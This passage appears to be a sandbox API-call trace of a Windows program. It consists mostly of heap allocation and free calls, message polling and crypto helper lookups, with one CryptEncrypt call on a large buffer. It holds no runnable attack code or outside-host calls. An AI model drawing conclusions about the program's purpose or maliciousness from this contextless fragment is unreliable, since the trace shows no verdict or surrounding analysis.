hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0153.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea8550 | out: hHeap=0x970000) returned 1 [0153.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.731] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0153.731] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0153.734] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0153.734] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e94440*, pdwDataLen=0x8cef60*=0x14106, dwBufLen=0x14108 | out: pbData=0x2e94440*, pdwDataLen=0x8cef60*=0x14108) returned 1 [0153.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0153.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0153.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0153.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0153.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0153.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0153.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0153.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0153.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0153.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0153.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0153.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0153.744] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0153.744] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0153.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0153.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0153.744] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0153.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0153.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0153.744] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0153.744] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0153.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0153.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0153.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0153.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0153.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0153.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0153.744] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0153.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0153.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0153.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0153.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0153.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0153.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0153.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0153.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0153.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0153.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0153.745] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0153.745] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0153.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0153.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0153.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0153.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0153.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0153.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0153.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0153.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0153.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0153.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0153.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14108) returned 0x2ea8550 [0153.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0153.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0153.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14108) returned 0x2ed0770 [0153.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0153.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0153.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea8550 | out: hHeap=0x970000) returned 1 [0153.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0153.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0153.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0153.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0153.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14108) returned 0x2ea8550 [0153.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed0770 | out: hHeap=0x970000) returned 1 [0153.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0153.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14108) returned 0x2ed0770 [0153.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea8550 | out: hHeap=0x970000) returned 1 [0153.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0153.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0153.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0153.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0153.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0153.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0153.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0153.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e94440 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0153.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0153.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0153.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0153.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0153.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0153.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebc660 | out: hHeap=0x970000) returned 1 [0153.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0153.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0153.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0153.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0153.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0153.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0153.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0153.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0153.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0153.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0153.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0153.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0153.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0153.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0153.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0153.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0153.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0153.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f28120 | out: hHeap=0x970000) returned 1 [0153.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0153.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0153.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14108) returned 0x2ee4880 [0153.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed0770 | out: hHeap=0x970000) returned 1 [0153.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0153.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0153.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0153.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 